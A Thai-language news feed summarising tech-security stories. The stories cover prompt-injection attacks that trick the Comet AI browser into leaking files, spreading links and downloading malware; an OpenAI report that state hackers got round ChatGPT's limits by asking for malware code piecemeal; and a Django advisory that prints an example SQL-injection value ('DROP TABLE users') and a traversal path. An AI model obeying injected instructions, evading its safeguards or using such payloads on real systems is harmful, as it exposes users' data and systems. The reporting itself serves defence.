ข้อมูลสำคัญจากข่าว ➡️ มีดาวเทียม Starlink ตกกลับสู่โลกวันละ 1–2 ดวงในปี 2025 ➡️ คาดว่าอาจเพิ่มเป็น 5 ดวงต่อวันเมื่อมีการส่งดาวเทียมเพิ่ม ➡️ อายุการใช้งานเฉลี่ยของดาวเทียมคือ 5 ปี ก่อนถูกลดวงโคจรและเผาไหม้ ➡️ ปัจจุบันมีดาวเทียมในวงโคจรต่ำประมาณ 12,000 ดวง โดย 8,500 ดวงเป็นของ Starlink ➡️ บริษัทอื่น เช่น Amazon Kuiper และจีน มีแผนส่งดาวเทียมหลายหมื่นดวง ➡️ มีเศษขยะอวกาศขนาดเซนติเมตรกว่า 1 ล้านชิ้นที่ไม่สามารถติดตามได้ ➡️ Starlink ออกแบบให้เผาไหม้หมดก่อนถึงพื้นโลก แต่บางชิ้นส่วนอาจตกถึงพื้น ➡️ NASA ยืนยันว่ามีชิ้นส่วนจากแคปซูล Dragon ตกลงใน North Carolina ➡️ นักวิทยาศาสตร์เริ่มศึกษาผลกระทบจากอนุภาคอะลูมิเนียมออกไซด์ต่อชั้นบรรยากาศ ✅ ข้อมูลเสริมจากภายนอก ➡️ Kessler Syndrome คือปรากฏการณ์ที่การชนกันของวัตถุในอวกาศทำให้เกิดเศษซากเพิ่มขึ้นแบบลูกโซ่ ➡️ การเผาไหม้ในชั้นบรรยากาศเกิดที่ระดับประมาณ 40 ไมล์เหนือพื้นโลก ➡️ ดาวเทียม Starlink มีขนาดประมาณ 30 เมตร และหนักถึง 1 ตัน ➡️ การแยกแยะดาวเทียมกับอุกกาบาตในท้องฟ้าทำได้จากความเร็วและทิศทางการเคลื่อนที่ ➡️ การควบคุมการตกของดาวเทียมยังเป็น “การช่วยเหลือแบบไม่สามารถควบคุมได้เต็มที่” https://www.tomshardware.com/networking/concerns-grow-after-spate-of-social-media-posts-showing-spacex-starlink-satellites-burning-in-the-sky-we-are-currently-seeing-a-couple-of-satellite-re-entries-a-day-says-respected-astrophysicist
    0 Comments 0 Shares 261 Views 0 Reviews
  • “SquareX เตือนภัยเบราว์เซอร์ AI — Comet ถูกหลอกให้ส่งมัลแวร์, แชร์ไฟล์ลับ และเปิดช่อง OAuth โดยไม่รู้ตัว”

    ในวันที่เบราว์เซอร์ AI กำลังกลายเป็นเครื่องมือหลักของผู้ใช้ทั่วโลก SquareX ได้เปิดเผยงานวิจัยด้านความปลอดภัยที่ชี้ให้เห็นช่องโหว่ร้ายแรงในเบราว์เซอร์ AI โดยเฉพาะ Comet ซึ่งเป็นเบราว์เซอร์จาก Perplexity ที่มีความสามารถในการทำงานแทนผู้ใช้แบบอัตโนมัติ

    SquareX พบว่า Comet สามารถถูกโจมตีผ่านหลายวิธี เช่น:

    การโจมตีแบบ OAuth ที่ทำให้แฮกเกอร์เข้าถึงอีเมลและ Google Drive ของเหยื่อได้ทั้งหมด
    การฝังลิงก์อันตรายในคำเชิญปฏิทินที่ส่งไปยังเพื่อนร่วมงานของเหยื่อ
    การหลอกให้ดาวน์โหลดมัลแวร์โดยปลอมเป็นไฟล์ที่จำเป็นต่อ workflow
    การส่งไฟล์ลับไปยังผู้โจมตีผ่านอีเมลโดยไม่ตั้งใจ

    ปัญหาหลักคือ AI Browser อย่าง Comet ไม่สามารถแยกแยะได้ว่าอะไรคือคำสั่งที่ปลอดภัย และอะไรคือคำสั่งที่ถูกแฮกเกอร์แทรกเข้ามาใน workflow โดยเฉพาะเมื่อเบราว์เซอร์มีสิทธิ์เท่ากับผู้ใช้ และทำงานแทนผู้ใช้โดยอัตโนมัติ

    SquareX ระบุว่าโซลูชันด้านความปลอดภัยแบบเดิม เช่น EDR หรือ SASE/SSE ไม่สามารถตรวจจับพฤติกรรมของ AI Browser ได้อย่างแม่นยำ เพราะไม่สามารถแยกแยะได้ว่าการกระทำมาจากผู้ใช้จริงหรือจาก AI agent

    Stephen Bennett, CISO ของ Domino’s Pizza Enterprises กล่าวเสริมว่า “เบราว์เซอร์เคยเป็นหน้าต่างของผู้ใช้ แต่ AI Browser กำลังเปลี่ยนให้ผู้ใช้กลายเป็นผู้โดยสาร” ซึ่งสะท้อนถึงความเสี่ยงที่ผู้ใช้อาจไม่สามารถควบคุมการทำงานของเบราว์เซอร์ได้อีกต่อไป

    SquareX เสนอให้มีการพัฒนาโซลูชันแบบ browser-native ที่สามารถแยกแยะตัวตนของ AI agent กับผู้ใช้จริง และกำหนดขอบเขตการเข้าถึงข้อมูลและการกระทำได้อย่างชัดเจน

    ข้อมูลสำคัญจากข่าว
    SquareX เปิดเผยช่องโหว่ในเบราว์เซอร์ AI โดยเฉพาะ Comet จาก Perplexity
    Comet ถูกโจมตีผ่าน OAuth ทำให้แฮกเกอร์เข้าถึงอีเมลและ Google Drive
    ถูกหลอกให้ฝังลิงก์อันตรายในคำเชิญปฏิทิน
    ถูกหลอกให้ดาวน์โหลดมัลแวร์โดยปลอมเป็นไฟล์ workflow
    ส่งไฟล์ลับไปยังผู้โจมตีโดยไม่ตั้งใจ
    AI Browser ทำงานแทนผู้ใช้โดยมีสิทธิ์เท่ากัน ทำให้ถูกหลอกได้ง่าย
    โซลูชัน EDR/SASE ไม่สามารถแยกแยะพฤติกรรมของ AI agent ได้
    SquareX เสนอให้มีระบบ browser-native ที่แยกแยะตัวตนและควบคุมการเข้าถึง

    ข้อมูลเสริมจากภายนอก
    Comet เป็นเบราว์เซอร์ AI ที่สามารถทำงานใน inbox, ปฏิทิน และระบบ cloud
    OAuth เป็นโปรโตคอลที่ใช้ในการให้สิทธิ์เข้าถึงข้อมูล โดยไม่ต้องใช้รหัสผ่าน
    Prompt injection คือการแทรกคำสั่งอันตรายเข้าไปใน workflow ของ AI
    AI Browser กำลังถูกนำมาใช้ในองค์กรเพื่อเพิ่ม productivity
    SquareX มีระบบ Browser Detection and Response (BDR) ที่ช่วยป้องกันภัยจากเบราว์เซอร์

    https://securityonline.info/squarex-shows-ai-browsers-fall-prey-to-oauth-attacks-malware-downloads-and-malicious-link-distribution/
    🕷️ “SquareX เตือนภัยเบราว์เซอร์ AI — Comet ถูกหลอกให้ส่งมัลแวร์, แชร์ไฟล์ลับ และเปิดช่อง OAuth โดยไม่รู้ตัว” ในวันที่เบราว์เซอร์ AI กำลังกลายเป็นเครื่องมือหลักของผู้ใช้ทั่วโลก SquareX ได้เปิดเผยงานวิจัยด้านความปลอดภัยที่ชี้ให้เห็นช่องโหว่ร้ายแรงในเบราว์เซอร์ AI โดยเฉพาะ Comet ซึ่งเป็นเบราว์เซอร์จาก Perplexity ที่มีความสามารถในการทำงานแทนผู้ใช้แบบอัตโนมัติ SquareX พบว่า Comet สามารถถูกโจมตีผ่านหลายวิธี เช่น: 🐛 การโจมตีแบบ OAuth ที่ทำให้แฮกเกอร์เข้าถึงอีเมลและ Google Drive ของเหยื่อได้ทั้งหมด 🐛 การฝังลิงก์อันตรายในคำเชิญปฏิทินที่ส่งไปยังเพื่อนร่วมงานของเหยื่อ 🐛 การหลอกให้ดาวน์โหลดมัลแวร์โดยปลอมเป็นไฟล์ที่จำเป็นต่อ workflow 🐛 การส่งไฟล์ลับไปยังผู้โจมตีผ่านอีเมลโดยไม่ตั้งใจ ปัญหาหลักคือ AI Browser อย่าง Comet ไม่สามารถแยกแยะได้ว่าอะไรคือคำสั่งที่ปลอดภัย และอะไรคือคำสั่งที่ถูกแฮกเกอร์แทรกเข้ามาใน workflow โดยเฉพาะเมื่อเบราว์เซอร์มีสิทธิ์เท่ากับผู้ใช้ และทำงานแทนผู้ใช้โดยอัตโนมัติ SquareX ระบุว่าโซลูชันด้านความปลอดภัยแบบเดิม เช่น EDR หรือ SASE/SSE ไม่สามารถตรวจจับพฤติกรรมของ AI Browser ได้อย่างแม่นยำ เพราะไม่สามารถแยกแยะได้ว่าการกระทำมาจากผู้ใช้จริงหรือจาก AI agent Stephen Bennett, CISO ของ Domino’s Pizza Enterprises กล่าวเสริมว่า “เบราว์เซอร์เคยเป็นหน้าต่างของผู้ใช้ แต่ AI Browser กำลังเปลี่ยนให้ผู้ใช้กลายเป็นผู้โดยสาร” ซึ่งสะท้อนถึงความเสี่ยงที่ผู้ใช้อาจไม่สามารถควบคุมการทำงานของเบราว์เซอร์ได้อีกต่อไป SquareX เสนอให้มีการพัฒนาโซลูชันแบบ browser-native ที่สามารถแยกแยะตัวตนของ AI agent กับผู้ใช้จริง และกำหนดขอบเขตการเข้าถึงข้อมูลและการกระทำได้อย่างชัดเจน ✅ ข้อมูลสำคัญจากข่าว ➡️ SquareX เปิดเผยช่องโหว่ในเบราว์เซอร์ AI โดยเฉพาะ Comet จาก Perplexity ➡️ Comet ถูกโจมตีผ่าน OAuth ทำให้แฮกเกอร์เข้าถึงอีเมลและ Google Drive ➡️ ถูกหลอกให้ฝังลิงก์อันตรายในคำเชิญปฏิทิน ➡️ ถูกหลอกให้ดาวน์โหลดมัลแวร์โดยปลอมเป็นไฟล์ workflow ➡️ ส่งไฟล์ลับไปยังผู้โจมตีโดยไม่ตั้งใจ ➡️ AI Browser ทำงานแทนผู้ใช้โดยมีสิทธิ์เท่ากัน ทำให้ถูกหลอกได้ง่าย ➡️ โซลูชัน EDR/SASE ไม่สามารถแยกแยะพฤติกรรมของ AI agent ได้ ➡️ SquareX เสนอให้มีระบบ browser-native ที่แยกแยะตัวตนและควบคุมการเข้าถึง ✅ ข้อมูลเสริมจากภายนอก ➡️ Comet เป็นเบราว์เซอร์ AI ที่สามารถทำงานใน inbox, ปฏิทิน และระบบ cloud ➡️ OAuth เป็นโปรโตคอลที่ใช้ในการให้สิทธิ์เข้าถึงข้อมูล โดยไม่ต้องใช้รหัสผ่าน ➡️ Prompt injection คือการแทรกคำสั่งอันตรายเข้าไปใน workflow ของ AI ➡️ AI Browser กำลังถูกนำมาใช้ในองค์กรเพื่อเพิ่ม productivity ➡️ SquareX มีระบบ Browser Detection and Response (BDR) ที่ช่วยป้องกันภัยจากเบราว์เซอร์ https://securityonline.info/squarex-shows-ai-browsers-fall-prey-to-oauth-attacks-malware-downloads-and-malicious-link-distribution/
    0 Comments 0 Shares 148 Views 0 Reviews
  • “Miggo Security คว้าตำแหน่ง Gartner Cool Vendor — พลิกเกมป้องกันภัยไซเบอร์ในยุค AI ด้วยการตรวจจับแบบเรียลไทม์”

    ในวันที่ AI กลายเป็นทั้งเครื่องมือสร้างสรรค์และช่องทางโจมตีใหม่สำหรับภัยไซเบอร์ บริษัท Miggo Security จาก Tel Aviv ได้รับการยกย่องจาก Gartner ให้เป็นหนึ่งใน “Cool Vendor” ด้าน AI Security ประจำปี 2025 จากความสามารถในการตรวจจับและตอบสนองภัยคุกคามในแอปพลิเคชันแบบเรียลไทม์ ผ่านแพลตฟอร์ม Application Detection & Response (ADR)

    Miggo มุ่งเน้นการแก้ปัญหา “ช่องว่างระหว่างการตรวจจับและการตอบสนอง” ซึ่งเป็นจุดอ่อนของระบบรักษาความปลอดภัยแบบเดิม โดยใช้เทคโนโลยี DeepTracing ที่สามารถตรวจจับภัยคุกคามใหม่ ๆ เช่น zero-day และรูปแบบการโจมตีที่เกิดขึ้นเฉพาะในแอปพลิเคชันที่มี AI ฝังอยู่

    แพลตฟอร์มของ Miggo ยังมีฐานข้อมูล AppDNA และ Predictive Vulnerability Database ที่ช่วยลด backlog ของช่องโหว่ได้ถึง 99% โดยใช้ AI วิเคราะห์บริบทของแอปพลิเคชันและจัดลำดับความสำคัญของช่องโหว่ที่ควรแก้ก่อน

    นอกจากนี้ยังมีฟีเจอร์ WAF Copilot ที่สามารถสร้างกฎป้องกันเว็บแอปพลิเคชันแบบ custom ได้ภายในไม่กี่นาที และระบบ Agentless Integration ที่สามารถติดตั้งร่วมกับ Kubernetes และระบบ CI/CD ได้โดยไม่ต้องเปลี่ยนโครงสร้างเดิม

    Gartner เตือนว่า “ภายในปี 2029 กว่า 50% ของการโจมตีไซเบอร์ที่สำเร็จต่อ AI agents จะเกิดจากการเจาะระบบควบคุมสิทธิ์ เช่น prompt injection” ซึ่งทำให้การป้องกันแบบ runtime และการวิเคราะห์พฤติกรรมของแอปพลิเคชันกลายเป็นสิ่งจำเป็น

    CEO ของ Miggo, Daniel Shechter กล่าวว่า “การได้รับการยอมรับจาก Gartner คือการยืนยันว่า ADR คืออนาคตของการรักษาความปลอดภัยในยุค AI” โดยเน้นว่าองค์กรต้องสามารถ “รู้ พิสูจน์ และป้องกัน” ภัยคุกคามที่เกิดขึ้นในแอปพลิเคชันได้ทันที

    ข้อมูลสำคัญจากข่าว
    Miggo Security ได้รับการยกย่องเป็น Gartner Cool Vendor ด้าน AI Security ปี 2025
    ใช้แพลตฟอร์ม Application Detection & Response (ADR) สำหรับการตรวจจับแบบ runtime
    เทคโนโลยี DeepTracing ตรวจจับ AI-native threats และ zero-day ได้แบบเรียลไทม์
    ฐานข้อมูล AppDNA และ Predictive Vulnerability Database ลด backlog ช่องโหว่ได้ 99%
    WAF Copilot สร้างกฎป้องกันเว็บแอปแบบ custom ได้ภายในไม่กี่นาที
    Agentless Integration รองรับ Kubernetes และระบบ CI/CD โดยไม่ต้องติดตั้ง agent
    Gartner เตือนภัย prompt injection จะเป็นช่องโหว่หลักของ AI agents ภายในปี 2029
    CEO Daniel Shechter ยืนยันว่า ADR คืออนาคตของการรักษาความปลอดภัยในยุค AI

    ข้อมูลเสริมจากภายนอก
    Prompt injection คือการแทรกคำสั่งใน input เพื่อควบคุมพฤติกรรมของ AI
    Zero-day คือช่องโหว่ที่ยังไม่มีแพตช์แก้ไข และมักถูกใช้ในการโจมตีขั้นสูง
    Runtime security คือการตรวจสอบพฤติกรรมของแอปพลิเคชันขณะทำงานจริง
    Gartner Cool Vendor เป็นการยกย่องบริษัทที่มีนวัตกรรมโดดเด่นในอุตสาหกรรม
    การใช้ AI ในระบบรักษาความปลอดภัยช่วยลดเวลาในการตอบสนองและเพิ่มความแม่นยำ

    https://hackread.com/miggo-security-named-a-gartner-cool-vendor-in-ai-security/
    🛡️ “Miggo Security คว้าตำแหน่ง Gartner Cool Vendor — พลิกเกมป้องกันภัยไซเบอร์ในยุค AI ด้วยการตรวจจับแบบเรียลไทม์” ในวันที่ AI กลายเป็นทั้งเครื่องมือสร้างสรรค์และช่องทางโจมตีใหม่สำหรับภัยไซเบอร์ บริษัท Miggo Security จาก Tel Aviv ได้รับการยกย่องจาก Gartner ให้เป็นหนึ่งใน “Cool Vendor” ด้าน AI Security ประจำปี 2025 จากความสามารถในการตรวจจับและตอบสนองภัยคุกคามในแอปพลิเคชันแบบเรียลไทม์ ผ่านแพลตฟอร์ม Application Detection & Response (ADR) Miggo มุ่งเน้นการแก้ปัญหา “ช่องว่างระหว่างการตรวจจับและการตอบสนอง” ซึ่งเป็นจุดอ่อนของระบบรักษาความปลอดภัยแบบเดิม โดยใช้เทคโนโลยี DeepTracing ที่สามารถตรวจจับภัยคุกคามใหม่ ๆ เช่น zero-day และรูปแบบการโจมตีที่เกิดขึ้นเฉพาะในแอปพลิเคชันที่มี AI ฝังอยู่ แพลตฟอร์มของ Miggo ยังมีฐานข้อมูล AppDNA และ Predictive Vulnerability Database ที่ช่วยลด backlog ของช่องโหว่ได้ถึง 99% โดยใช้ AI วิเคราะห์บริบทของแอปพลิเคชันและจัดลำดับความสำคัญของช่องโหว่ที่ควรแก้ก่อน นอกจากนี้ยังมีฟีเจอร์ WAF Copilot ที่สามารถสร้างกฎป้องกันเว็บแอปพลิเคชันแบบ custom ได้ภายในไม่กี่นาที และระบบ Agentless Integration ที่สามารถติดตั้งร่วมกับ Kubernetes และระบบ CI/CD ได้โดยไม่ต้องเปลี่ยนโครงสร้างเดิม Gartner เตือนว่า “ภายในปี 2029 กว่า 50% ของการโจมตีไซเบอร์ที่สำเร็จต่อ AI agents จะเกิดจากการเจาะระบบควบคุมสิทธิ์ เช่น prompt injection” ซึ่งทำให้การป้องกันแบบ runtime และการวิเคราะห์พฤติกรรมของแอปพลิเคชันกลายเป็นสิ่งจำเป็น CEO ของ Miggo, Daniel Shechter กล่าวว่า “การได้รับการยอมรับจาก Gartner คือการยืนยันว่า ADR คืออนาคตของการรักษาความปลอดภัยในยุค AI” โดยเน้นว่าองค์กรต้องสามารถ “รู้ พิสูจน์ และป้องกัน” ภัยคุกคามที่เกิดขึ้นในแอปพลิเคชันได้ทันที ✅ ข้อมูลสำคัญจากข่าว ➡️ Miggo Security ได้รับการยกย่องเป็น Gartner Cool Vendor ด้าน AI Security ปี 2025 ➡️ ใช้แพลตฟอร์ม Application Detection & Response (ADR) สำหรับการตรวจจับแบบ runtime ➡️ เทคโนโลยี DeepTracing ตรวจจับ AI-native threats และ zero-day ได้แบบเรียลไทม์ ➡️ ฐานข้อมูล AppDNA และ Predictive Vulnerability Database ลด backlog ช่องโหว่ได้ 99% ➡️ WAF Copilot สร้างกฎป้องกันเว็บแอปแบบ custom ได้ภายในไม่กี่นาที ➡️ Agentless Integration รองรับ Kubernetes และระบบ CI/CD โดยไม่ต้องติดตั้ง agent ➡️ Gartner เตือนภัย prompt injection จะเป็นช่องโหว่หลักของ AI agents ภายในปี 2029 ➡️ CEO Daniel Shechter ยืนยันว่า ADR คืออนาคตของการรักษาความปลอดภัยในยุค AI ✅ ข้อมูลเสริมจากภายนอก ➡️ Prompt injection คือการแทรกคำสั่งใน input เพื่อควบคุมพฤติกรรมของ AI ➡️ Zero-day คือช่องโหว่ที่ยังไม่มีแพตช์แก้ไข และมักถูกใช้ในการโจมตีขั้นสูง ➡️ Runtime security คือการตรวจสอบพฤติกรรมของแอปพลิเคชันขณะทำงานจริง ➡️ Gartner Cool Vendor เป็นการยกย่องบริษัทที่มีนวัตกรรมโดดเด่นในอุตสาหกรรม ➡️ การใช้ AI ในระบบรักษาความปลอดภัยช่วยลดเวลาในการตอบสนองและเพิ่มความแม่นยำ https://hackread.com/miggo-security-named-a-gartner-cool-vendor-in-ai-security/
    HACKREAD.COM
    Miggo Security Named a Gartner® Cool Vendor in AI Security
    Tel Aviv, Israel, 8th October 2025, CyberNewsWire
    0 Comments 0 Shares 221 Views 0 Reviews
  • “OpenAI เตือนภัย — กลุ่มแฮกเกอร์จากรัฐต่างชาติใช้ AI เป็นเครื่องมือโจมตีไซเบอร์แบบครบวงจร”

    รายงานล่าสุดจาก OpenAI ในเดือนตุลาคม 2025 ชื่อว่า “Disrupting Malicious Uses of AI” เผยให้เห็นแนวโน้มที่น่ากังวล: กลุ่มภัยคุกคามจากรัฐต่างชาติ เช่น รัสเซีย จีน เกาหลีเหนือ และอิหร่าน กำลังใช้เครื่องมือ AI อย่าง ChatGPT และโมเดลอื่น ๆ เพื่อเสริมประสิทธิภาพในการโจมตีไซเบอร์ การหลอกลวง และปฏิบัติการชักจูงทางข้อมูล (influence operations)

    OpenAI พบว่ากลุ่มเหล่านี้ไม่ได้เปลี่ยนวิธีการโจมตี แต่ใช้ AI เพื่อทำให้กระบวนการเดิมเร็วขึ้นและแม่นยำขึ้น เช่น เขียนมัลแวร์ ปรับแต่งข้อความฟิชชิ่ง หรือจัดการเนื้อหาหลอกลวงในโซเชียลมีเดีย โดยใช้ ChatGPT ในขั้นตอนวางแผนและใช้โมเดลอื่นในขั้นตอนปฏิบัติ

    ตัวอย่างที่พบ ได้แก่:

    กลุ่มรัสเซียใช้ ChatGPT เพื่อเขียนโค้ดสำหรับ remote-access tools และ credential stealers โดยหลบเลี่ยงข้อจำกัดของโมเดลด้วยการขอคำแนะนำทีละส่วน

    กลุ่มเกาหลีเหนือใช้ ChatGPT เพื่อ debug โค้ดและสร้างข้อความฟิชชิ่งเกี่ยวกับคริปโตเคอร์เรนซี

    กลุ่มจีนใช้ ChatGPT เพื่อสร้างเนื้อหาฟิชชิ่งหลายภาษา และช่วย debug มัลแวร์ โดยมีเป้าหมายโจมตีสถาบันการศึกษาและอุตสาหกรรมเซมิคอนดักเตอร์

    นอกจากนี้ยังพบการใช้ AI ในเครือข่ายหลอกลวงขนาดใหญ่ในประเทศกัมพูชา เมียนมา และไนจีเรีย เช่น ใช้ ChatGPT เพื่อแปลข้อความ สร้างโปรไฟล์บริษัทลงทุนปลอม และจัดการกลุ่มแชตปลอมใน WhatsApp

    ที่น่ากังวลที่สุดคือการใช้ AI เพื่อวัตถุประสงค์ด้านการสอดแนม โดยมีบัญชีที่เชื่อมโยงกับรัฐบาลจีนขอให้ ChatGPT ช่วยร่างข้อเสนอสำหรับระบบติดตามบุคคล เช่น “แบบจำลองเตือนภัยการเคลื่อนไหวของชาวอุยกูร์” โดยใช้ข้อมูลการเดินทางและตำรวจ

    OpenAI ยืนยันว่าโมเดลของตนตอบกลับเฉพาะข้อมูลสาธารณะ และได้ปิดบัญชีที่เกี่ยวข้องกับการใช้งานผิดวัตถุประสงค์ไปแล้วกว่า 40 เครือข่าย พร้อมร่วมมือกับ Microsoft Threat Intelligence เพื่อป้องกันการละเมิดในอนาคต

    ข้อมูลสำคัญจากข่าว
    OpenAI เผยรายงาน “Disrupting Malicious Uses of AI” เดือนตุลาคม 2025
    พบการใช้ AI โดยกลุ่มภัยคุกคามจากรัฐ เช่น รัสเซีย จีน เกาหลีเหนือ และอิหร่าน
    ใช้ ChatGPT เพื่อวางแผนโจมตี เช่น เขียนโค้ดมัลแวร์และข้อความฟิชชิ่ง
    กลุ่มจีนใช้ AI เพื่อสร้างเนื้อหาฟิชชิ่งหลายภาษาและ debug มัลแวร์
    กลุ่มรัสเซียใช้หลายบัญชี ChatGPT เพื่อสร้าง remote-access tools
    กลุ่มเกาหลีเหนือใช้ AI เพื่อพัฒนา VPN และ browser extensions
    เครือข่ายหลอกลวงในกัมพูชา เมียนมา และไนจีเรียใช้ AI เพื่อจัดการกลุ่มแชตปลอม
    พบการใช้ AI เพื่อวัตถุประสงค์ด้านการสอดแนม เช่น ติดตามชาวอุยกูร์
    OpenAI ปิดบัญชีที่ละเมิดแล้วกว่า 40 เครือข่าย และร่วมมือกับ Microsoft

    ข้อมูลเสริมจากภายนอก
    WormGPT, FraudGPT และ SpamGPT เป็นโมเดล AI ที่ถูกใช้ในงานโจมตีโดยเฉพาะ
    MatrixPDF เป็นเครื่องมือที่เปลี่ยนไฟล์ PDF ธรรมดาให้กลายเป็นมัลแวร์
    Influence operations คือการใช้ข้อมูลเพื่อชักจูงความคิดเห็นสาธารณะ
    “Stop News” และ “Nine emdash Line” เป็นแคมเปญที่ใช้ AI เพื่อสร้างเนื้อหาโปรรัสเซียและวิจารณ์ประเทศในเอเชีย
    AI ถูกใช้ในการวางแผนโจมตีแบบ kill chain ตั้งแต่ reconnaissance ถึง execution

    https://hackread.com/openai-ai-tools-exploitation-threat-groups/
    🧠 “OpenAI เตือนภัย — กลุ่มแฮกเกอร์จากรัฐต่างชาติใช้ AI เป็นเครื่องมือโจมตีไซเบอร์แบบครบวงจร” รายงานล่าสุดจาก OpenAI ในเดือนตุลาคม 2025 ชื่อว่า “Disrupting Malicious Uses of AI” เผยให้เห็นแนวโน้มที่น่ากังวล: กลุ่มภัยคุกคามจากรัฐต่างชาติ เช่น รัสเซีย จีน เกาหลีเหนือ และอิหร่าน กำลังใช้เครื่องมือ AI อย่าง ChatGPT และโมเดลอื่น ๆ เพื่อเสริมประสิทธิภาพในการโจมตีไซเบอร์ การหลอกลวง และปฏิบัติการชักจูงทางข้อมูล (influence operations) OpenAI พบว่ากลุ่มเหล่านี้ไม่ได้เปลี่ยนวิธีการโจมตี แต่ใช้ AI เพื่อทำให้กระบวนการเดิมเร็วขึ้นและแม่นยำขึ้น เช่น เขียนมัลแวร์ ปรับแต่งข้อความฟิชชิ่ง หรือจัดการเนื้อหาหลอกลวงในโซเชียลมีเดีย โดยใช้ ChatGPT ในขั้นตอนวางแผนและใช้โมเดลอื่นในขั้นตอนปฏิบัติ ตัวอย่างที่พบ ได้แก่: 🔰 กลุ่มรัสเซียใช้ ChatGPT เพื่อเขียนโค้ดสำหรับ remote-access tools และ credential stealers โดยหลบเลี่ยงข้อจำกัดของโมเดลด้วยการขอคำแนะนำทีละส่วน 🔰 กลุ่มเกาหลีเหนือใช้ ChatGPT เพื่อ debug โค้ดและสร้างข้อความฟิชชิ่งเกี่ยวกับคริปโตเคอร์เรนซี 🔰 กลุ่มจีนใช้ ChatGPT เพื่อสร้างเนื้อหาฟิชชิ่งหลายภาษา และช่วย debug มัลแวร์ โดยมีเป้าหมายโจมตีสถาบันการศึกษาและอุตสาหกรรมเซมิคอนดักเตอร์ นอกจากนี้ยังพบการใช้ AI ในเครือข่ายหลอกลวงขนาดใหญ่ในประเทศกัมพูชา เมียนมา และไนจีเรีย เช่น ใช้ ChatGPT เพื่อแปลข้อความ สร้างโปรไฟล์บริษัทลงทุนปลอม และจัดการกลุ่มแชตปลอมใน WhatsApp ที่น่ากังวลที่สุดคือการใช้ AI เพื่อวัตถุประสงค์ด้านการสอดแนม โดยมีบัญชีที่เชื่อมโยงกับรัฐบาลจีนขอให้ ChatGPT ช่วยร่างข้อเสนอสำหรับระบบติดตามบุคคล เช่น “แบบจำลองเตือนภัยการเคลื่อนไหวของชาวอุยกูร์” โดยใช้ข้อมูลการเดินทางและตำรวจ OpenAI ยืนยันว่าโมเดลของตนตอบกลับเฉพาะข้อมูลสาธารณะ และได้ปิดบัญชีที่เกี่ยวข้องกับการใช้งานผิดวัตถุประสงค์ไปแล้วกว่า 40 เครือข่าย พร้อมร่วมมือกับ Microsoft Threat Intelligence เพื่อป้องกันการละเมิดในอนาคต ✅ ข้อมูลสำคัญจากข่าว ➡️ OpenAI เผยรายงาน “Disrupting Malicious Uses of AI” เดือนตุลาคม 2025 ➡️ พบการใช้ AI โดยกลุ่มภัยคุกคามจากรัฐ เช่น รัสเซีย จีน เกาหลีเหนือ และอิหร่าน ➡️ ใช้ ChatGPT เพื่อวางแผนโจมตี เช่น เขียนโค้ดมัลแวร์และข้อความฟิชชิ่ง ➡️ กลุ่มจีนใช้ AI เพื่อสร้างเนื้อหาฟิชชิ่งหลายภาษาและ debug มัลแวร์ ➡️ กลุ่มรัสเซียใช้หลายบัญชี ChatGPT เพื่อสร้าง remote-access tools ➡️ กลุ่มเกาหลีเหนือใช้ AI เพื่อพัฒนา VPN และ browser extensions ➡️ เครือข่ายหลอกลวงในกัมพูชา เมียนมา และไนจีเรียใช้ AI เพื่อจัดการกลุ่มแชตปลอม ➡️ พบการใช้ AI เพื่อวัตถุประสงค์ด้านการสอดแนม เช่น ติดตามชาวอุยกูร์ ➡️ OpenAI ปิดบัญชีที่ละเมิดแล้วกว่า 40 เครือข่าย และร่วมมือกับ Microsoft ✅ ข้อมูลเสริมจากภายนอก ➡️ WormGPT, FraudGPT และ SpamGPT เป็นโมเดล AI ที่ถูกใช้ในงานโจมตีโดยเฉพาะ ➡️ MatrixPDF เป็นเครื่องมือที่เปลี่ยนไฟล์ PDF ธรรมดาให้กลายเป็นมัลแวร์ ➡️ Influence operations คือการใช้ข้อมูลเพื่อชักจูงความคิดเห็นสาธารณะ ➡️ “Stop News” และ “Nine emdash Line” เป็นแคมเปญที่ใช้ AI เพื่อสร้างเนื้อหาโปรรัสเซียและวิจารณ์ประเทศในเอเชีย ➡️ AI ถูกใช้ในการวางแผนโจมตีแบบ kill chain ตั้งแต่ reconnaissance ถึง execution https://hackread.com/openai-ai-tools-exploitation-threat-groups/
    HACKREAD.COM
    OpenAI Finds Growing Exploitation of AI Tools by Foreign Threat Groups
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 Comments 0 Shares 283 Views 0 Reviews
  • เตือนภัย! ขนตาแม่เหล็กหลุดเข้าไปในตาทั้งแผง! ใครใช้อยู่ ระวังให้ดี
    เตือนภัย! ขนตาแม่เหล็กหลุดเข้าไปในตาทั้งแผง! ใครใช้อยู่ ระวังให้ดี
    Like
    1
    0 Comments 0 Shares 315 Views 0 0 Reviews
  • “Django ออกแพตช์ด่วน! อุดช่องโหว่ SQL Injection ร้ายแรงใน MySQL/MariaDB พร้อมเตือนภัย Directory Traversal”

    ทีมพัฒนา Django ได้ออกอัปเดตความปลอดภัยครั้งสำคัญในวันที่ 1 ตุลาคม 2025 เพื่อแก้ไขช่องโหว่สองรายการที่ส่งผลกระทบต่อระบบฐานข้อมูลและการตั้งค่าโปรเจกต์ โดยเฉพาะช่องโหว่ CVE-2025-59681 ซึ่งถูกจัดอยู่ในระดับ “ร้ายแรง” เนื่องจากเปิดทางให้ผู้โจมตีสามารถฝังคำสั่ง SQL ผ่านฟังก์ชันยอดนิยมของ Django ORM ได้แก่ annotate(), alias(), aggregate() และ extra() เมื่อใช้งานร่วมกับฐานข้อมูล MySQL หรือ MariaDB

    ช่องโหว่นี้เกิดจากการใช้ dictionary expansion (**kwargs) ที่ไม่ผ่านการตรวจสอบอย่างเหมาะสม ทำให้ attacker สามารถส่ง key ที่มีคำสั่ง SQL แฝงเข้าไปเป็น column alias ได้โดยตรง เช่น malicious_alias; DROP TABLE users; -- ซึ่งจะถูกแปลเป็นคำสั่ง SQL และรันทันทีหากระบบไม่มีการป้องกัน

    อีกหนึ่งช่องโหว่ CVE-2025-59682 แม้จะมีความรุนแรงต่ำกว่า แต่ก็อันตรายไม่น้อย โดยเกิดจากฟังก์ชัน django.utils.archive.extract() ที่ใช้ในการสร้างโปรเจกต์หรือแอปผ่าน template ซึ่งสามารถถูกใช้เพื่อโจมตีแบบ directory traversal ได้ หากไฟล์ใน archive มี path ที่คล้ายกับโฟลเดอร์เป้าหมาย เช่น ../../config.py อาจทำให้ไฟล์สำคัญถูกเขียนทับได้

